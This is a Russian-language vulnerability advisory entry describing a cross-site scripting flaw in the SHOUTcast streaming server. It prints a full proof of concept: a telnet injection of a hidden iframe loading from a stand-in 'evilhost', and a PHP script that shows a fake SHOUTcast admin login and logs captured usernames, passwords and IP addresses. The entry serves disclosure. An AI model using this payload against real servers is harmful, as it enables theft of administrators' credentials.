Дата публикации: | 06.03.2003 |
Всего просмотров: | 1814 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | SHOUTcast - Winamp система потокового аудио от Nullsoft. Уязвимость в проверке правильности ввода обнаружена в SHOUTcast сервере. Удаленный пользователь может выполнить XSS нападение против администратора SHOUTcast. Пример: telnet localhost 8001 <IFrame src=http://evilhost/script.php width=0 height=0></iframe>changemeГде script.php: <?php $fp = fopen("log.txt","a+"); if (!isset( $_SERVER["PHP_AUTH_USER"] )) { header( 'WWW-Authenticate: Basic realm="Shoutcast Server"' ); header( 'HTTP/1.0 401 Unauthorized' ); echo '<HTML><HEAD>Unauthorized<title>SHOUTcast Administrator</title></HEAD></HTML>'; exit; } else { fwrite($fp,'|' . $_SERVER["PHP_AUTH_USER"] . '|' . $_SERVER["PHP_AUTH_PW"] . '|' . $_SERVER["REMOTE_ADDR"] . $content); } fclose($fp); ?>Произвольный код сценария будет выполнен в браузере администратора системы, когда он проматривает Log файлы в административном интерфейсе. |
Ссылки: | Cross Site Scripting Trick May Fool Shoutcast Admins |